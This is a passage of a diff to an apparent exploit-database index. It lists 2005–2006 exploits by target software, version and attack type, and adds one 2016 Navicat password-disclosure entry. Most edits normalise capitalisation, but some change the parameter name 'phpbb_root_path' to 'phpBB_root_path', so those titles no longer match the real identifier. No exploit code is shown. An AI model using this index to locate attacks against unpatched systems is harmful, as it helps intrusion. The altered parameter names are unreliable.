1091,platforms/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow",2005-07-06,c0d3r,windows,local,0 -1092,platforms/solaris/local/1092.c,"Solaris SPARC / x86 - Local Socket Hijack Exploit",2005-07-06,c0ntex,solaris,local,0 +1092,platforms/solaris/local/1092.c,"Solaris (SPARC / x86) - Local Socket Hijack Exploit",2005-07-06,c0ntex,solaris,local,0 1093,platforms/windows/dos/1093.c,"PrivaShare 1.3 - Denial of Service",2005-07-07,basher13,windows,dos,0 1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW 1.05 - Denial of Service",2005-07-07,Qnix,windows,dos,0 1095,platforms/php/webapps/1095.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure Exploit",2005-07-08,D|ablo,php,webapps,0 @@ -920,7 +920,7 @@ id,file,description,date,author,platform,type,port 1110,platforms/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)",2005-07-15,"Edward Gagnon",windows,dos,0 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,php,webapps,0 1112,platforms/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 -1113,platforms/php/webapps/1113.pm,"PHPBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit)",2005-07-19,str0ke,php,webapps,0 +1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit)",2005-07-19,str0ke,php,webapps,0 1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote,0 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (1)",2005-07-21,snooq,windows,dos,0 @@ -945,7 +945,7 @@ id,file,description,date,author,platform,type,port 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 1140,platforms/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 1142,platforms/php/webapps/1142.php,"Wordpress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps,0 -1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys'Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0 +1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 1145,platforms/php/webapps/1145.pm,"Wordpress 1.5.1.3 - Remote Code Execution Exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 @@ -1039,7 +1039,7 @@ id,file,description,date,author,platform,type,port 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Remote Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection",2005-10-10,rgod,php,webapps,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - (Hijacking Command) Denial of Service",2005-10-11,basher13,windows,dos,0 -1247,platforms/linux/remote/1247.pl,"PHPBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 +1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0 1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - (quicklist.php) Remote Code Execution Exploit",2005-10-14,rgod,php,webapps,0 1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 @@ -1107,14 +1107,14 @@ id,file,description,date,author,platform,type,port 1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - (imapd) Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",windows,dos,0 1328,platforms/windows/dos/1328.c,"Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos,0 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - (config.php) SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 -1330,platforms/windows/remote/1330.c,"FreeFTPD 1.0.8 - (USER) Remote Buffer Overflow",2005-11-17,Expanders,windows,remote,21 +1330,platforms/windows/remote/1330.c,"freeFTPd 1.0.8 - (USER) Remote Buffer Overflow",2005-11-17,Expanders,windows,remote,21 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - (Action) Denial of Service",2005-11-18,BassReFLeX,multiple,dos,0 1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging Buffer Overflow Exploit (Metasploit)",2005-11-20,y0,windows,remote,143 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)",2005-11-20,"H D Moore",hardware,remote,80 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos,0 1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution Exploit",2005-11-22,rgod,php,webapps,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",hardware,dos,0 -1339,platforms/windows/dos/1339.c,"FreeFTPD 1.0.10 - (PORT Command) Denial of Service",2005-11-24,"Stefan Lochbihler",windows,dos,0 +1339,platforms/windows/dos/1339.c,"freeFTPd 1.0.10 - (PORT Command) Denial of Service",2005-11-24,"Stefan Lochbihler",windows,dos,0 1340,platforms/php/webapps/1340.php,"eFiction 2.0 - (Fake .gif) Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 1341,platforms/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 @@ -1190,7 +1190,7 @@ id,file,description,date,author,platform,type,port 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 -1424,platforms/windows/dos/1424.pl,"Tftpd32 2.81 - (GET Request) Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 +1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 1425,platforms/linux/local/1425.c,"Xmame 0.102 - (-pb/-lang/-rec) Local Buffer Overflow",2006-01-21,sj,linux,local,0 1442,platforms/php/webapps/1442.pl,"ezDatabase 2.0 - (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - (-X Option) Privilege Escalation",2006-01-24,"Johnny Mast",linux,local,0 @@ -1231,7 +1231,7 @@ id,file,description,date,author,platform,type,port 1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion Exploit",2006-02-09,rgod,php,webapps,0 1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,1589 -1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp'Denial of Service",2006-02-10,darkeagle,windows,dos,0 +1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0 1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow (2)",2006-02-11,k3xji,windows,local,0 1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 @@ -1266,7 +1266,7 @@ id,file,description,date,author,platform,type,port 1522,platforms/php/webapps/1522.php,"NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 (Search) SQL Injection",2006-02-23,unitedbr,php,webapps,0 1524,platforms/php/webapps/1524.htm,"VHCS 2.4.7.1 - (Add User) Authentication Bypass Exploit",2006-02-23,RoMaNSoFt,php,webapps,0 -1525,platforms/php/webapps/1525.pl,"PHPWebSite 0.10.0-full - (topics.php) SQL Injection",2006-02-24,SnIpEr_SA,php,webapps,0 +1525,platforms/php/webapps/1525.pl,"phpWebSite 0.10.0-full - (topics.php) SQL Injection",2006-02-24,SnIpEr_SA,php,webapps,0 1526,platforms/php/webapps/1526.php,"Lansuite 2.1.0 Beta - (fid) SQL Injection",2006-02-24,x128,php,webapps,0 1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - (config_inc.php) Remote Code Execution Exploit",2006-02-25,rgod,php,webapps,0 1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - (newsdetailsview) SQL Injection",2006-02-25,nukedx,asp,webapps,0 @@ -1296,7 +1296,7 @@ id,file,description,date,author,platform,type,port 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0 1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow",2006-03-05,"Agustin Gianni",multiple,local,0 -1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp'Buffer Overflow",2006-03-05,Kozan,windows,local,0 +1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp' Buffer Overflow",2006-03-05,Kozan,windows,local,0 1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - (load) SQL Injection",2006-03-06,SkOd,php,webapps,0 1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 1558,platforms/windows/dos/1558.c,"LieroX 0.62b - Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",windows,dos,0 @@ -1349,7 +1349,7 @@ id,file,description,date,author,platform,type,port 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0 1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket 0.71 - 'search.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 -1610,platforms/php/webapps/1610.txt,"PHPBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0 +1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - (function.php) Local File Inclusion Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0 @@ -1522,6 +1522,7 @@ id,file,description,date,author,platform,type,port 1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion",2006-05-20,Kacper,php,webapps,0 1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - (links.php) SQL Injection",2006-05-20,666,php,webapps,0 1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 +40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (64bit) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0 1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110 1814,platforms/php/webapps/1814.txt,"UBB Threads 6.4.x-6.5.2 - (thispath) Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 @@ -1696,7 +1697,7 @@ id,file,description,date,author,platform,type,port 1987,platforms/asp/webapps/1987.txt,"Hosting Controller 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps,0 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian)",2006-07-06,oveRet,windows,local,0 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0 -1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl'Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 +1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution Exploit",2006-07-07,rgod,php,webapps,0 1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 @@ -1713,7 +1714,7 @@ id,file,description,date,author,platform,type,port 2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (2)",2006-07-12,"Julien Tinnes",linux,local,0 2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",linux,local,0 -2007,platforms/php/webapps/2007.php,"PHPBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps,0 +2007,platforms/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps,0 2008,platforms/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps,0 @@ -1806,7 +1807,7 @@ id,file,description,date,author,platform,type,port 2106,platforms/osx/local/2106.pl,"Mac OSX 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2107,platforms/osx/local/2107.pl,"Mac OSX 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2108,platforms/osx/local/2108.sh,"Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 -2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - (/lib/PHPbb.php) Remote File Inclusion",2006-08-02,|peti,php,webapps,0 +2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - (/lib/phpBB.php) Remote File Inclusion",2006-08-02,|peti,php,webapps,0 2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution Exploit (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 2111,platforms/osx/local/2111.pl,"Mac OSX 10.3.8 - (CF_CHARSET_PATH) Local Buffer Overflow Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0 @@ -2043,7 +2044,7 @@ id,file,description,date,author,platform,type,port 2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - (include_path) Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / Cross-Site Scripting",2006-09-11,s3rv3r_hack3r,php,webapps,0 2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 -2349,platforms/php/webapps/2349.txt,"PHPBB XS 0.58 - (functions.php) Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 +2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - (functions.php) Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 2350,platforms/php/webapps/2350.txt,"p4CMS 1.05 - (abs_pfad) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - (form) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2352,platforms/php/webapps/2352.txt,"webSPELL 4.01.01 - Database Backup Download",2006-09-12,Trex,php,webapps,0 @@ -2146,7 +2147,7 @@ id,file,description,date,author,platform,type,port 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2451,platforms/php/webapps/2451.txt,"PHPMyWebmin 1.0 - (window.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"PHPSecurePages 0.28b - (secure.php) Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 -2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a - (phpbb_root_path) Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 +2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a - (phpBB_root_path) Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a - 'index.php' Remote File Inclusion",2006-09-29,v1per-haCker,php,webapps,0 2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - (pdf.php) Remote File Inclusion Exploit",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - (display.php) SQL Injection",2006-09-29,Trex,php,webapps,0 @@ -2170,11 +2171,11 @@ id,file,description,date,author,platform,type,port 2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0 2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Include",2006-10-04,SpiderZ,php,webapps,0 2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - (footer.php) Remote File Inclusion",2006-10-04,mozi,php,webapps,0 -2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpbb_root_path File Include",2006-10-04,Kw3[R]Ln,php,webapps,0 +2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpBB_root_path File Include",2006-10-04,Kw3[R]Ln,php,webapps,0 2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0 2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,php,webapps,0 -2480,platforms/php/webapps/2480.txt,"PHPBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0 -2481,platforms/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - (phpbb_root_path) Remote File Inclusions",2006-10-05,SpiderZ,php,webapps,0 +2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0 +2481,platforms/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - (phpBB_root_path) Remote File Inclusions",2006-10-05,SpiderZ,php,webapps,0 2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - (POST) Remote Buffer Overflow",2006-10-05,SkOd,windows,remote,0 2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker 1.0 - File Include",2006-10-06,"Mehmet Ince",php,webapps,0 2484,platforms/php/webapps/2484.txt,"FreeForum 0.9.7 - (forum.php) Remote File Inclusion",2006-10-07,"Mehmet Ince",php,webapps,0 @@ -2210,7 +2211,7 @@ id,file,description,date,author,platform,type,port 2514,platforms/php/webapps/2514.txt,"n@board 3.1.9e - (naboard_pnr.php) Remote File Inclusion",2006-10-11,mdx,php,webapps,0 2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Include",2006-10-11,"Nima Salehi",php,webapps,0 -2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - (PHPbb.inc.php) Remote File Inclusion Exploit",2006-10-11,"Nima Salehi",php,webapps,0 +2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - (phpBB.inc.php) Remote File Inclusion Exploit",2006-10-11,"Nima Salehi",php,webapps,0 2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - (scriptpath) Multiple Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - File Inclusion",2006-10-12,MP,php,webapps,0 @@ -2231,21 +2232,21 @@ id,file,description,date,author,platform,type,port 2535,platforms/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - (menu.inc.php) File Include",2006-10-13,k1tk4t,php,webapps,0 2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - (fullpath) File Inclusion",2006-10-13,k1tk4t,php,webapps,0 2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - (bb_usage_stats.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2538,platforms/php/webapps/2538.pl,"PHPBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2539,platforms/php/webapps/2539.txt,"Genepi 1.6 - (genepi.php) Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps,0 2540,platforms/php/webapps/2540.txt,"Cdsagenda 4.2.9 - (SendAlertEmail.php) File Include",2006-10-13,Drago84,php,webapps,0 2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0 2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0 2543,platforms/solaris/local/2543.sh,"Solaris 10 (libnspr) - Arbitrary File Creation Privilege Escalation",2006-10-13,"Marco Ivaldi",solaris,local,0 -2544,platforms/php/webapps/2544.pl,"PHPBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2544,platforms/php/webapps/2544.pl,"phpBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2546,platforms/php/webapps/2546.pl,"PHPBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2549,platforms/php/webapps/2549.pl,"PHPBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - File Inclusion",2006-10-13,bd0rk,php,webapps,0 -2552,platforms/php/webapps/2552.pl,"PHPBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - (Offline.php) Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 @@ -2304,7 +2305,7 @@ id,file,description,date,author,platform,type,port 2608,platforms/php/webapps/2608.txt,"Virtual Law Office - (phpc_root_path) Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusion",2006-10-21,k1tk4t,php,webapps,0 -2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3'Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 +2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 2613,platforms/php/webapps/2613.txt,"MambWeather Mambo Module 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0 2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - (DNS/RR.php) Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion",2006-10-22,k1tk4t,php,webapps,0 @@ -2326,7 +2327,7 @@ id,file,description,date,author,platform,type,port 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - (swask) Format String 